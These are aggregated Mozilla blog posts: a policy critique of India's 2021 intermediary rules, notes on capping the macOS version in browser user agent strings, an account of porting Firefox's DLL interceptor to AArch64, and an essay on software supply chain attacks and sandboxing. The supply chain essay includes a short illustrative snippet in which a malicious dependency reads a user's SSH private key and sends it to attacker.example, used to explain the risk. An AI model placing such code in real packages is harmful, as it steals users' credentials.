
Mozilla Privacy Blog: India’s new intermediary liability and digital media regulations will harm the open internet

Mozilla planet - Tue, 02/03/2021 - 13:15

Last week, in a sudden move that will have disastrous consequences for the open internet, the Indian government notified a new regime for intermediary liability and digital media regulation. Intermediary liability (or "safe harbor") protections have been fundamental to growth and innovation on the internet as an open and secure medium of communication and commerce. By expanding the "due diligence" obligations that intermediaries will have to follow to avail themselves of safe harbor, these rules will harm end-to-end encryption, substantially increase surveillance, promote automated filtering and prompt a fragmentation of the internet that would harm users while failing to empower Indians. While many of the most onerous provisions only apply to "significant social media intermediaries" (a new classification scheme), the ripple effects of these provisions will have a devastating impact on freedom of expression, privacy and security.

As we explain below, the current rules are not fit-for-purpose and will have a series of unintended consequences on the health of the internet as a whole:

  • Traceability of Encrypted Content: Under the new rules, law enforcement agencies can demand that companies trace the "first originator" of any message. Many popular services today deploy end-to-end encryption and do not store source information, so as to enhance the security of their systems and the privacy they guarantee users. When the first originator is outside India, the significant intermediary must identify the first originator within the country, making an already impossible task more difficult. This would essentially be a mandate requiring encrypted services to store additional sensitive information and/or break end-to-end encryption, which would weaken overall security, harm privacy and contradict the principles of data minimization endorsed in the Ministry of Electronics and Information Technology's (MeitY) draft of the data protection bill.
  • Harsh Content Takedown and Data Sharing Timelines: Short timelines of 36 hours for content takedowns and 72 hours for the sharing of user data for all intermediaries pose significant implementation and freedom of expression challenges. Intermediaries, especially small and medium service providers, would not have sufficient time to analyze the requests or seek any further clarifications or other remedies under the current rules. This would likely create a perverse incentive to take down content and share user data without sufficient due process safeguards, with the fundamental right to privacy and freedom of expression (as we've said before) suffering as a result.
  • User-Directed Takedowns of Non-Consensual Sexually Explicit Content and Morphed/Impersonated Content: All intermediaries have to remove or disable access to information within 24 hours of being notified by users or their representatives (not necessarily government agencies or courts) when it comes to non-consensual sexually explicit content (revenge pornography, etc.) and impersonation in an electronic form (deep fakes, etc.). While it attempts to address a legitimate and concerning issue, this solution is overbroad and goes against the landmark Shreya Singhal judgment of the Indian Supreme Court, which clarified in 2015 that companies would only be expected to remove content when directed to do so by a court order or a government agency.
  • Social Media User Verification: In a move that could be dangerous for the privacy and anonymity of internet users, the law contains a provision requiring significant intermediaries to provide the option for users to voluntarily verify their identities. This would likely entail users sharing phone numbers or sending photos of government issued IDs to the companies. This provision will incentivize the collection of sensitive personal data submitted for this verification, which can then also be used to profile and target users (the law does seem to require explicit consent to do so). This is not hypothetical conjecture – we have already seen phone numbers collected for security purposes being used for profiling. This provision will also increase the risk from data breaches and entrench power in the hands of large players in the social media and messaging space who can afford to build and maintain such verification systems. There is no evidence to prove that this measure will help fight misinformation (its motivating factor), and it ignores the benefits that anonymity can bring to the internet, such as whistleblowing and protection from stalkers.
  • Automated Filtering: While improved from its earlier iteration in the 2018 draft, the provisions to "endeavor" to carry out automated filtering for child sexual abuse materials (CSAM), non-consensual sexual acts and previously removed content apply to all significant social media intermediaries (including end-to-end encrypted messaging applications). These are likely fundamentally incompatible with end-to-end encryption and will weaken protections that millions of users have come to rely on in their daily lives, by requiring companies to embed monitoring infrastructure to continuously surveil the activities of users, with disastrous implications for freedom of expression and privacy.
  • Digital Media Regulation: In a surprising expansion of scope, the new rules also contain government registration and content takedown provisions for online news websites, online news aggregators and curated audio-visual platforms. After some self-regulatory stages, it essentially gives government agencies the ability to order the takedown of online news and current affairs content by publishers (which are not intermediaries), with very few meaningful checks and balances against overreach.

The final rules do contain some improvements over the 2011 original law and the 2018 draft, such as limiting the scope of some provisions to significant social media intermediaries, user and public transparency requirements, due process checks and balances around traceability requests, limiting the automated filtering provision and an explicit recognition of the "good samaritan" principle for voluntary enforcement of platform guidelines. In their overall scope, however, they set a dangerous precedent for internet regulation and need urgent reform.

Ultimately, illegal and harmful content on the web, the lack of sufficient accountability and substandard responses to it undermine the overall health of the internet and, as such, are a core concern for Mozilla. We have been at the forefront of these conversations globally (such as in the UK, the EU and even on the 2018 version of this draft in India), pushing for approaches that manage the harms of illegal content online within a rights-protective framework. The regulation of speech online necessarily calls into play numerous fundamental rights and freedoms guaranteed by the Indian constitution (freedom of speech, right to privacy, due process, etc.), as well as crucial technical considerations ("does the architecture of the internet render this type of measure possible or not", etc.). This is a delicate and critical balance, and not one that should be approached with blunt policy proposals.

These rules are already binding law, with the provisions for significant social media intermediaries coming into force three months from now (approximately late May 2021). Given the many new provisions in these rules, we recommend that they be withdrawn, and that wide-ranging and participatory consultations with all relevant stakeholders be held prior to any re-notification.

The post India’s new intermediary liability and digital media regulations will harm the open internet appeared first on Open Policy & Advocacy.

Categories: Mozilla-nl planet

Karl Dubost: Capping User Agent String - followup meeting

Mozilla planet - Tue, 02/03/2021 - 03:27

Web compatibility is about dealing with a constantly evolving biotope where things die slowly. And even when they disappear, they have contributed to the balance of the ecosystem and modified it in ways that outlast them.

Ginkgo dead leaves

A couple of weeks ago, I mentioned the steps which have been taken toward capping the User Agent String on macOS 11 for Web compatibility issues. Since then, Mozilla and Google organized a meeting to discuss the status and the issues related to this effort. We invited Apple, but probably too late to find someone who could participate in the meeting (my bad). The minutes of the meeting are publicly accessible.

Meeting Summary
  • Apple and Mozilla have both already shipped the macOS 11 UA capping.
  • There is an intent to ship for Google, and Ken Russell is double-checking that they can move forward with the release that would align Chrome with Firefox and Safari.
  • Mozilla has not seen any obvious breakage since the change to the UA string. This is only deployed in Nightly right now. Tantek: "My general philosophy is that the UA string has been abused for so long, freezing any part of it is a win."
  • Mozilla and Google agreed to find a venue for more general public plans for UA reduction/freezing.
Some additional news since the meeting
  • In the intent to ship for Google, some big queries on HTTP Archive are being run to check how widespread the issue is. An interesting comment from Yoav says that "79.4% of Unity sites out there are broken in Chrome".
  • We are very close to having a place for working with other browser vendors on UA reduction and freezing. More news soon (hopefully).

To comment…

Archived copy of the minutes

This is to preserve a copy of the minutes in case they are defaced or changed.

Capping UA string
====

(Minutes will be public)

Present: Mike Taylor (Google), Karl Dubost (Mozilla), Chris Peterson (Mozilla), Aaron Tagliaboschi (Mozilla), Kenneth Russell (Google), Avi Drissman (Google), Tantek Çelik (Mozilla)

### Background

  • Karl's summary/history of the issue so far: https://www.otsukare.info/2021/02/15/capping-macos-user-agent
  • What Apple/Safari currently does: Safari caps the UA string to 10.15.7.
  • What is Mozilla's status so far: Capped the UA's macOS version at 10.15 in Firefox 87 and soon ESR 78: https://bugzilla.mozilla.org/show_bug.cgi?id=1679929. Capped the Windows version to 10 (so we can control when and how we bump Firefox's Windows OS version if Microsoft ever bumps Windows's version): https://bugzilla.mozilla.org/show_bug.cgi?id=1693295

### What is Google's status so far

Ken: We have 3 LGTMs on blink-dev, but some folks had concerns. We know there's broad breakage because of this issue. It's not just Unity, and it's spread across a lot of other sites. I think we should land this. Apple has already made this change. Our CL is ready to land.

Avi: I have no specific concerns. It aligns with our future goals. It is unfortunate it brings us ahead of our understood schedule.

Mike: Moz is on board. Google seems to be on board.

Kenneth: If there are any objections from the Chromium side, there has been plenty of time to react.

Mike: Have there been any breakage reports for Mozilla after landing?

Karl: Not yet. I've seen a lot of reports related to Cloudinary, etc., which are a larger concern for Apple. For Firefox, there was no breakage with regards to the thing that was released last week. It's not yet in release. There's still plenty of time to back it out if needed.

Chris: Was there an issue for Duo Mobile?

Karl: We didn't have any reports like this. But we saw a mention online... From what I understood, Apple had modified the UA string to be 10.15. Then the OS evolved to 10.16. Duo had an issue with the disparity between 10.15.7 in the OS and 10.15.6 in the browser. Since then, they modified it and there's no other issue.

Karl: On the Firefox side, if we have breakage, we still have the possibility to do site-specific UA interventions.

Ken: Did you (Tantek) have concerns about this change? The review sat there for a while.

Tantek: I didn't have any problems with freezing the macOS version, per the comments in our Bugzilla on that. My general philosophy is that the UA string has been abused for so long, freezing any part of it is a win. I don't even think we need a 1:1 replacement for everything that's in there today.

Chris: The long review time was unrelated to reservations; we were sorting out ownership of the module.

### macOS 11.0 compat issues

  • Unity's UA parsing issue
  • Cloudinary's Safari WebP issue (Firefox and Chrome send an "Accept: image/webp" header.)

### Recurring sync on UA Reduction efforts

Which public arena should we have this discussion in?

Mike: We do have public plans for UA reduction/freezing. These might evolve. It would be cool to be able to meet in the future with other vendors and discuss the options.

Chris & Karl: Usual standards forums would be good. People have opinions on venues.

Otsukare!

Categories: Mozilla-nl planet

Karl Dubost: Capping macOS User Agent String on macOS 11

Mozilla planet - Tue, 02/03/2021 - 03:27

Update on 2021-03-02: Capping User Agent String - followup meeting

This is to keep track of and document the sequence of events related to macOS 11 and another cascade of breakage related to the change of user agent strings. There is no good solution. One more time, it shows how sniffing User Agent strings is both dangerous (future fail) and a source of issues.
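To make the failure mode concrete, here is a minimal, hypothetical sketch of the kind of version sniffing that breaks (the regular expression and the site logic are illustrative, not taken from any specific site):

    // The UA string a browser might send on macOS Big Sur without any cap.
    const ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/605.1.15";

    // Fragile sniffing: assumes the macOS version always begins with "10".
    const match = ua.match(/Mac OS X 10[._](\d+)/);
    if (!match) {
      // On macOS 11 this branch is taken, and the site wrongly concludes
      // it is running on an ancient or unknown system.
      console.log("Unsupported OS");
    }

    // With the cap, the browser keeps reporting "Intel Mac OS X 10_15_7",
    // so legacy parsers like the one above keep working.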

Brace for impact!

Lion foot statue

Capping macOS 11 version in User Agent History
  • 2020-06-25 OPENED WebKit 213622 - Safari 14 - User Agent string shows incorrect OS version

    A reporter claims it breaks many websites, but without giving details about which websites. There's a mention of VP9:

    browser supports vp9

    I left a comment there to get more details.

  • 2020-09-15 OPENED WebKit 216593 - [macOS] Limit reported macOS release to 10.15 series.

    if (!osVersion.startsWith("10")) osVersion = "10_15_6"_s;

    With some comments in the review:

    preserve original OS version on older macOS at Charles's request

    I suspect this is Charles, the proxy app.

    2020-09-16 FIXED

  • 2020-10-05 OPENED WebKit 217364 - [macOS] Bump reported current shipping release UA to 10_15_7

    On macOS Catalina 10.15.7, Safari reports platform user agent with OS version 10_15_7. On macOS Big Sur 11.0, Safari reports platform user agent with OS version 10_15_6. It's a bit odd to have Big Sur report an older OS version than Catalina. Bump the reported current shipping release UA from 10_15_6 to 10_15_7.

    The issue here is that macOS 11 (Big Sur) reports an older version number than macOS 10.15 (Catalina), because the previous bug hardcoded the version string.

    if (!osVersion.startsWith("10")) osVersion = "10_15_7"_s;

    This is still hardcoded because, as this comment explains:

    Catalina quality updates are done, so 10.15.7 is the last patch version. Security SUs from this point on won’t increment the patch version, and does not affect the user agent.

    2020-10-06 FIXED

  • 2020-10-11 Unity [WebGL][macOS] Builds do not run when using Big Sur

    UnityLoader.js is the culprit.

    They fixed it in January 2021(?). But there is a lot of legacy code running out there which could not be updated.

    Ironically, there's no easy way to detect the Unity library in order to create a site intervention that would apply to all games with the issue. Capping the UA string will fix that.

  • 2020-11-30 OPENED Webkit 219346 - User-agent on macOS 11.0.1 reports as 10_15_6 which is older than latest Catalina release.

    It was closed as a duplicate of 217364, but there's an interesting description:

    Regression from 216593. That rev hard codes the User-Agent header to report MacOS X 10_15_6 on macOS 11.0+ which breaks Duo Security UA sniffing OS version check. Duo security check fails because latest version of macOS Catalina is 10.15.7 but 10.15.6 is being reported.

  • 2020-11-30 OPENED Gecko 1679929 - Cap the User-Agent string's reported macOS version at 10.15

    There is a patch for Gecko to cap the user agent string the same way Apple does for Safari. This will solve the issue with Unity games which have been unable to update their source code to the new version of Unity.

    // Cap the reported macOS version at 10.15 (like Safari) to avoid breaking
    // sites that assume the UA's macOS version always begins with "10.".
    int uaVersion = (majorVersion >= 11 || minorVersion > 15) ? 15 : minorVersion;

    // Always return an "Intel" UA string, even on ARM64 macOS like Safari does.
    mOscpu = nsPrintfCString("Intel Mac OS X 10.%d", uaVersion);

    It should land very soon, this week (week 8, February 2021), in Firefox Nightly 87. We can then monitor whether anything breaks with this change.

  • 2020-12-04 OPENED Gecko 1680516 - [Apple Chip - ARM64 M1] Game is not loaded on Gamearter.com

    Older versions of the Unity JS engine used to run games are broken when the macOS version in the browser's user agent string is 11.0.

    The Mozilla webcompat team proposed to fix this with a Site Intervention for gamearter specifically. This doesn't solve the breakage for other games.

  • 2020-12-14 OPENED Gecko 1682238 - Override navigator.userAgent for gamearter.com on macOS 11.0

    A quick way to fix the issue on Firefox for gamearter was to release a site intervention by the Mozilla webcompat team:

    "use strict"; /* * Bug 1682238 - Override navigator.userAgent for gamearter.com on macOS 11.0 * Bug 1680516 - Game is not loaded on gamearter.com * * Unity < 2021.1.0a2 is unable to correctly parse User Agents with * "Mac OS X 11.0" in them, so let's override to "Mac OS X 10.16" instead * for now. */ /* globals exportFunction */ if (navigator.userAgent.includes("Mac OS X 11.")) { console.info( "The user agent has been overridden for compatibility reasons. See https://bugzilla.mozilla.org/show_bug.cgi?id=1680516 for details." ); let originalUA = navigator.userAgent; Object.defineProperty(window.navigator.wrappedJSObject, "userAgent", { get: exportFunction(function() { return originalUA.replace(/Mac OS X 11\.(\d)+;/, "Mac OS X 10.16;"); }, window), set: exportFunction(function() {}, window), }); }
  • 2020-12-16 OPENED WebKit 219977 - WebP loading error in Safari on iOS 14.3

    In this comment, Cloudinary explains that they try to work around the system bug by using UA detection.

    Cloudinary is attempting to work around this issue by turning off WebP support to affected clients.

    If this is indeed about the underlying OS frameworks, rather than the browser version, as far as we can tell it appeared sometime after MacOS 11.0.1 and before or in 11.1.0. All we have been able to narrow down on the iOS side is ≥14.0.

    If you have additional guidance on which versions of the OSes are affected, so that we can prevent Safari users from receiving broken images, it would be much appreciated!

    Eric Portis (Cloudinary) created some tests:

      • WebPs that break in iOS ≥ 14.3 & macOS ≥ 11.1
      • Tiny WebP

    The issue seems to affect Cloudflare.

  • 2021-01-05 OPENED WebKit WebP failures [ Big Sur ] fast/images/webp-as-image.html is failing

  • 2021-01-29 OPENED Blink 1171998 - Nearly all Unity WebGL games fail to run in Chrome on macOS 11 because of userAgent

  • 2021-02-06 OPENED Blink 1175225 - Cap the reported macOS version in the user-agent string at 10_15_7

    Colleagues at Mozilla, on the Firefox team, and Apple, on the Safari team, report that there are a long tail of websites broken from reporting the current macOS Big Sur version, e.g. 11_0_0, in the user agent string:

    Mac OS X 11_0_0

    and for this reason, as well as slightly improving user privacy, have decided to cap the reported OS version in the user agent string at 10.15.7:

    Mac OS X 10_15_7

  • 2021-02-09 Blink Intent to Ship: User Agent string: cap macOS version number to 10_15_7

    Ken Russell sends an intent to cap the macOS version in the Chrome (Blink) user agent string to 10_15_7, following in the footsteps of Apple and Mozilla. In the intent to ship, there is a discussion of solving the issue with Client Hints. Sec-CH-UA-Platform-Version would be a possibility, but Client Hints is not yet deployed across browsers and there is not yet a full consensus about it. This is a specification pushed by Google and partially implemented in Chrome.

    Masataka Yakura shared with me (thanks!) two threads on the webkit-dev mailing list: one from May 2020 and another from November 2020.

    In May, Maciej said:

    I think there’s a number of things in the spec that should be cleaned up before an implementation ships enabled by default, specifically around interop, privacy, and protection against UA lockouts. I know there are PRs in flight for some of these issues. I think it would be good to get more of the open issues to resolution before actually shipping this.

    And in November, Maciej did another round of spec review with one decisive issue.

    Note that Google released an Intent to Ship: Client Hints infrastructure and UA Client Hints on January 14, 2020, and this was enabled a couple of days ago, on February 11, 2021.

And I'm pretty sure the story is not over. There will probably be more breakage and more unknown bugs.

Otsukare!

Categories: Mozilla-nl planet

Aaron Klotz: 2019 Roundup: Part 1 - Porting the DLL Interceptor to AArch64

Mozilla planet - Mon, 01/03/2021 - 20:50

In my continuing efforts to get caught up on discussing my work, I am now commencing a roundup for 2019. I think I am going to structure this one slightly differently from the last one: I am going to try to segment this roundup by project.

Here is an index of all the entries in this series:

Porting the DLL Interceptor to AArch64

During early 2019, Mozilla was working to port Firefox to run on the new AArch64 builds of Windows. At our December 2018 all-hands, I brought up the necessity of including the DLL Interceptor in our porting efforts. Since no good deed goes unpunished, I was put in charge of doing the work! [I’m actually kidding here; this project was right up my alley and I was happy to do it! – Aaron]

Before continuing, you might want to review my previous entry describing the Great Interceptor Refactoring of 2018, as this post revisits some of the concepts introduced there.

Let us review some DLL Interceptor terminology:

  • The target function is the function we want to hook (Note that this is a distinct concept from a branch target, which is also discussed in this post);
  • The hook function is our function that we want the intercepted target function to invoke;
  • The trampoline is a small chunk of executable code generated by the DLL interceptor that facilitates calling the target function’s original implementation.

On more than one occasion I had to field questions about why this work was even necessary for AArch64: there aren’t going to be many injected DLLs in a Win32 ecosystem running on a shiny new processor architecture! In fact, the DLL Interceptor is used for more than just facilitating the blocking of injected DLLs; we also use it for other purposes.

Not all of this work was done in one bug: some tasks were more urgent than others. I began this project by enumerating our extant uses of the interceptor to determine which instances were relevant to the new AArch64 port. I threw a record of each instance into a colour-coded spreadsheet, which proved to be very useful for tracking progress: Reds were “must fix” instances, yellows were “nice to have” instances, and greens were “fixed” instances. Coordinating with the milestones laid out by program management, I was able to assign each instance to a bucket which would help determine a total ordering for the various fixes. I landed the first set of changes in bug 1526383, and the second set in bug 1532470.

It was now time to sit down, download some AArch64 programming manuals, and take a look at what I was dealing with. While I have been messing around with x86 assembly since I was a teenager, my first exposure to RISC architectures was via the DLX architecture introduced by Hennessy and Patterson in their textbooks. While DLX was crafted specifically for educational purposes, it served for me as a great point of reference. When I was a student taking CS 241 at the University of Waterloo, we had to write a toy compiler that generated DLX code. That experience ended up saving me a lot of time when looking into AArch64! While the latter is definitely more sophisticated, I could clearly recognize analogs between the two architectures.

In some ways, targeting a RISC architecture greatly simplifies things: The DLL Interceptor only needs to concern itself with a small subset of the AArch64 instruction set: loads and branches. In fact, the DLL Interceptor’s AArch64 disassembler only looks for nine distinct instructions! As a bonus, since the instruction length is fixed, we can easily copy over verbatim any instructions that are not loads or branches!

On the other hand, one thing that increased the complexity of the port is that some branch instructions to relative addresses have maximum offsets. If we must branch farther than that maximum, we must take alternate measures. For example, in AArch64, an unconditional branch with an immediate offset must land in the range of ±128 MiB from the current program counter.

Why is this a problem, you ask? Well, Detours-style interception must overwrite the first several instructions of the target function. To write an absolute jump, we require at least 16 bytes: 4 for an LDR instruction, 4 for a BR instruction, and another 8 for the 64-bit absolute branch target address.

Unfortunately, target functions may be really short! Some of the target functions that we need to patch consist only of a single 4-byte instruction!

In this case, our only option for patching the target is to use an immediate B instruction, but that only works if our hook function falls within that ±128 MiB limit. If it does not, we need to construct a veneer. A veneer is a special trampoline whose location falls within the target range of a branch instruction. Its sole purpose is to provide an unconditional jump to the “real” desired branch target that lies outside of the range of the original branch. Using veneers, we can successfully hook a target function even if it is only one instruction (i.e., 4 bytes) in length and the hook function lies more than 128 MiB away from it. The AArch64 Procedure Call Standard specifies X16 as a volatile register that is explicitly intended for use by veneers: veneers load an absolute target address into X16 (without needing to worry about whether or not they’re clobbering anything), and then unconditionally jump to it.

Measuring Target Function Instruction Length

To determine how many instructions the target function has for us to work with, we make two passes over the target function’s code. The first pass simply counts how many instructions are available for patching (up to the 4 instruction maximum needed for absolute branches; we don’t really care beyond that).

The second pass actually populates the trampoline, builds the veneer (if necessary), and patches the target function.

Veneer Support

Since the DLL interceptor is already well-equipped to build trampolines, it did not take much effort to add support for constructing veneers. However, where to write out a veneer is just as important as what to write to a veneer.

Recall that we need our veneer to reside within ±128 MiB of an immediate branch. Therefore, we need to be able to exercise some control over where the trampoline memory for veneers is allocated. Until this point, our trampoline allocator had no need to care about this; I had to add this capability.

Adding Range-Aware VM Allocation

Firstly, I needed to make the MMPolicy classes range-aware: we need to be able to allocate trampoline space within acceptable distances from branch instructions.

Consider that, as described above, a branch instruction may have limits on the extents of its target. As data, this is easily formatted as a pivot (i.e., the PC at the location where the branch instruction is encountered) and a maximum distance in either direction from that pivot.

On the other hand, range-constrained memory allocation tends to work in terms of lower and upper bounds. I wrote a conversion method, MMPolicyBase::SpanFromPivotAndDistance, to convert between the two formats. In addition to format conversion, this method also constrains the resulting bounds such that they are above the 1 MiB mark of the process’ address space (to avoid reserving memory in VM regions that are sensitive to compatibility concerns), as well as below the maximum allowable user-mode VM address.
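As a rough illustration of that conversion (sketched in JavaScript rather than the C++ of the actual implementation, with hypothetical names and constants), the logic looks something like this:

    // Hypothetical sketch of the pivot/distance -> [lower, upper] conversion
    // performed by MMPolicyBase::SpanFromPivotAndDistance.
    const kMinAllowableAddress = 0x100000; // stay above the first 1 MiB of VM
    const kMaxUserModeAddress = 0x7ffffffeffff; // illustrative user-mode ceiling

    function spanFromPivotAndDistance(pivot, maxDistance) {
      // Clamp the raw span to the usable user-mode address range.
      const lower = Math.max(pivot - maxDistance, kMinAllowableAddress);
      const upper = Math.min(pivot + maxDistance, kMaxUserModeAddress);
      return [lower, upper];
    }

    // Example: an unconditional immediate branch that can reach ±128 MiB.
    const [lower, upper] = spanFromPivotAndDistance(0x180000000, 128 * 1024 * 1024);
    console.log(lower.toString(16), upper.toString(16));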

Another issue with range-aware VM allocation is determining the location, within the allowable range, for the actual VM reservation. Ideally we would like the kernel’s memory manager to choose the best location for us: its holistic view of existing VM layout (not to mention ASLR) across all processes will provide superior VM reservations. On the other hand, the Win32 APIs that facilitate this are specific to Windows 10. When available, MMPolicyInProcess uses VirtualAlloc2 and MMPolicyOutOfProcess uses MapViewOfFile3. When we’re running on Windows versions where those APIs are not yet available, we need to fall back to finding and reserving our own range. The MMPolicyBase::FindRegion method handles this for us.

All of this logic is wrapped up in the MMPolicyBase::Reserve method. In addition to the desired VM size and range, the method also accepts two functors that wrap the OS APIs for reserving VM. Reserve uses those functors when available, otherwise it falls back to FindRegion to manually locate a suitable reservation.

Now that our memory management primitives were range-aware, I needed to shift my focus over to our VM sharing policies.

One impetus for the Great Interceptor Refactoring was to enable separate Interceptor instances to share a unified pool of VM for trampoline memory. To make this range-aware, I needed to make some additional changes to VMSharingPolicyShared. It would no longer be sufficient to assume that we could just share a single block of trampoline VM — we now needed to make the shared VM policy capable of potentially allocating multiple blocks of VM.

VMSharingPolicyShared now contains a mapping of ranges to VM blocks. If we request a reservation which an existing block satisfies, we re-use that block. On the other hand, if we require a range that is yet unsatisfied, then we need to allocate a new one. I admit that I kind of half-assed the implementation of the data structure we use for the mapping; I was too lazy to implement a fully-fledged interval tree. The current implementation is probably “good enough,” however it’s probably worth fixing at some point.

Finally, I added a new generic class, TrampolinePool, that acts as an abstraction of a reserved block of VM address space. The main interceptor code requests a pool by calling the VM sharing policy’s Reserve method, then it uses the pool to retrieve new Trampoline instances to be populated.

AArch64 Trampolines

It is much simpler to generate trampolines for AArch64 than it is for x86(-64). The most noteworthy addition to the Trampoline class is the WriteLoadLiteral method, which writes an absolute address into the trampoline’s literal pool, followed by writing an LDR instruction referencing that literal into the trampoline.

Thanks for reading! Coming up next time: My Untrusted Modules Opus.

Categories: Mozilla-nl planet

Jan-Erik Rediger: Three-year Moziversary

Mozilla planet - Mon, 01/03/2021 - 11:00

Has it really been 3 years? I guess it has. I joined Mozilla as a Firefox Telemetry Engineer in March 2018, I blogged twice already: 2019, 2020.

And now it's 2021. 2020 was nothing like I thought it would be, and still a lot like what I said last year at this point. It's been Glean all over the year, but instead of working from the office and occasionally meeting my team in person, it's been working from home for 12 months now.

In September of last year I officially became the Glean SDK tech lead and thus I'm now responsible for the technical direction and organisation of the whole project, but really this is a team effort. Throughout the year we made Project FOG happen. At least the code is there and we can start migrating now. It's far from finished of course.

I blogged about Glean in 2021 and we're already seeing the first pieces of that plan being implemented. After some reorganization, the team I'm in grew again, so now we have Daniel, Anthony and Frank there as well (we're still Team "Browser Measurement III"). This brings two parts of the Glean project closer together (not that they were far apart).

There's more work ahead, interesting challenges to tackle and projects to support in migrating to Glean. To the next year and beyond!

Thank you

Thanks to my team: Bea, Chris, Travis, Alessio, Mike, Daniel, Anthony and Frank and also thanks to the bigger data engineering team within Mozilla. And thanks to all the other people at Mozilla I work with.

Categories: Mozilla-nl planet

The Mozilla Blog: Notes on Addressing Supply Chain Vulnerabilities

Mozilla planet - Sat, 27/02/2021 - 23:41

Addressing Supply Chain Vulnerabilities

One of the unsung achievements of modern software development is the degree to which it has become componentized: not that long ago, when you wanted to write a piece of software you had to write pretty much the whole thing using whatever tools were provided by the language you were writing in, maybe with a few specialized libraries like OpenSSL. No longer. The combination of newer languages, Open Source development and easy-to-use package management systems like JavaScript’s npm or Rust’s Cargo/crates.io has revolutionized how people write software, making it standard practice to pull in third party libraries even for the simplest tasks; it’s not at all uncommon for programs to depend on hundreds or thousands of third party packages.

Supply Chain Attacks

While this new paradigm has revolutionized software development, it has also greatly increased the risk of supply chain attacks, in which an attacker compromises one of your dependencies and through that your software.[1] A famous example of this is provided by the 2018 compromise of the event-stream package to steal Bitcoin from people’s computers. The Register’s brief history provides a sense of the scale of the problem:

Ayrton Sparling, a computer science student at California State University, Fullerton (FallingSnow on GitHub), flagged the problem last week in a GitHub issues post. According to Sparling, a commit to the event-stream module added flatmap-stream as a dependency, which then included injection code targeting another package, ps-tree.

There are a number of ways in which an attacker might manage to inject malware into a package. In this case, what seems to have happened is that the original maintainer of event-stream was no longer working on it and someone else volunteered to take it over. Normally, that would be great, but here it seems that volunteer was malicious, so it’s not great.

Standards for Critical Packages

Recently, Eric Brewer, Rob Pike, Abhishek Arya, Anne Bertucio and Kim Lewandowski posted a proposal on the Google security blog for addressing vulnerabilities in Open Source software. They cover a number of issues including vulnerability management and security of compilation, and there’s a lot of good stuff here, but the part that has received the most attention is the suggestion that certain packages should be designated “critical”[2]:

For software that is critical to security, we need to agree on development processes that ensure sufficient review, avoid unilateral changes, and transparently lead to well-defined, verifiable official versions.

These are good development practices, and ones we follow here at Mozilla, so I certainly encourage people to adopt them. However, trying to require them for critical software seems like it will have some problems.

It creates friction for the package developer

One of the real benefits of this new model of software development is that it’s low friction: it’s easy to develop a library and make it available — you just write it and put it up on a package repository like crates.io — and it’s easy to use those packages — you just add them to your build configuration. But then you’re successful and suddenly your package is widely used and gets deemed “critical” and now you have to put in place all kinds of new practices. It probably would be better if you did this, but what if you don’t? At this point your package is widely used — or it wouldn’t be critical — so what now?

It’s not enough

Even packages which are well maintained and have good development practices routinely have vulnerabilities. For example, Firefox recently released a new version that fixed a vulnerability in the popular ANGLE graphics engine, which is maintained by Google. Both Mozilla and Google follow the practices that this blog post recommends, but it’s just the case that people make mistakes. To (possibly mis)quote Steve Bellovin, “Software has bugs. Security-relevant software has security-relevant bugs”. So, while these practices are important to reduce the risk of vulnerabilities, we know they can’t eliminate them.

Of course this applies to inadvertent vulnerabilities, but what about malicious actors (though note that Brewer et al. observe that “Taking a step back, although supply-chain attacks are a risk, the vast majority of vulnerabilities are mundane and unintentional—honest errors made by well-intentioned developers.”)? It’s possible that some of their proposed changes (in particular forbidding anonymous authors) might have an impact here, but it’s really hard to see how this is actionable. What’s the standard for not being anonymous? That you have an e-mail address? A Web page? A DUNS number?[3] None of these seem particularly difficult for a dedicated attacker to fake and of course the more strict you make the requirements the more it’s a burden for the (vast majority) of legitimate developers.

I do want to acknowledge at this point that Brewer et al. clearly state that multiple layers of protection needed and that it’s necessary to have robust mechanisms for handling vulnerability defenses. I agree with all that, I’m just less certain about this particular piece.

Redefining Critical

Part of the difficulty here is that there are two different ways in which a piece of software can be “critical”:

  • It can do something which is inherently security sensitive (e.g., the OpenSSL SSL/TLS stack which is responsible for securing a huge fraction of Internet traffic).
  • It can be widely used (e.g., the Rust log crate), but not inherently that sensitive.

The vast majority of packages — widely used or not — fall into the second category: they do something important but that isn’t security critical. Unfortunately, because of the way that software is generally built, this doesn’t matter: even when software is built out of a pile of small components, when they’re packaged up into a single program, each component has all the privileges that that program has. So, for instance, suppose you include a component for doing statistical calculations: if that component is compromised nothing stops it from opening up files on your disk and stealing your passwords or Bitcoins or whatever. This is true whether the compromise is due to an inadvertant vulnerability or malware injected into the package: a problem in any component compromises the whole system.[4] Indeed, minor non-security components make attractive targets because they may not have had as much scrutiny as high profile security components.
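To make this concrete, here is a contrived Node.js sketch (the package, file path and host are hypothetical) of how an innocuous-looking dependency holds the full authority of the program that imports it:

    // stats.js - a hypothetical "statistics" dependency.
    const fs = require("fs");
    const https = require("https");

    // The advertised, legitimate functionality.
    function mean(values) {
      return values.reduce((sum, v) => sum + v, 0) / values.length;
    }

    // Nothing in the module system stops a compromised version from also
    // shipping something like this, running with the application's privileges:
    function exfiltrate() {
      const key = fs.readFileSync(`${process.env.HOME}/.ssh/id_rsa`, "utf8");
      https.request({ host: "attacker.example", method: "POST" }).end(key);
    }

    module.exports = { mean };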

Least Privilege in Practice: Better Sandboxing

When looked at from this perspective, it’s clear that we have a technology problem: there’s no good reason for individual components to have this much power. Rather, they should only have the capabilities they need to do the job they are intended to do (the technical term is least privilege); it’s just that the software tools we have don’t do a good job of providing this property. This is a situation which has long been recognized in complicated pieces of software like Web browsers, which employ a technique called “process sandboxing” (pioneered by Chrome) in which the code that interacts with the Web site is run in its own “sandbox” and has limited abilities to interact with your computer. When it wants to do something that it’s not allowed to do, it talks to the main Web browser code and asks it to do so on its behalf, thus allowing that code to enforce the rules without being exposed to vulnerabilities in the rest of the browser.

Process sandboxing is an important and powerful tool, but it’s a heavyweight one; it’s not practical to separate out every subcomponent of a large program into its own process. The good news is that there are two recent technologies which do allow this kind of fine-grained sandboxing, both based on WebAssembly. For WebAssembly programs, nanoprocesses allow individual components to run in their own sandbox with component-specific access control lists. More recently, we have been experimenting with a technology called RLBox developed by researchers at UCSD, UT Austin, and Stanford which allows regular programs such as Firefox to run sandboxed components. The basic idea behind both of these is the same: use static compilation techniques to ensure that the component is memory-safe (i.e., cannot reach outside of itself to touch other parts of the program) and then give it only the capabilities it needs to do its job.

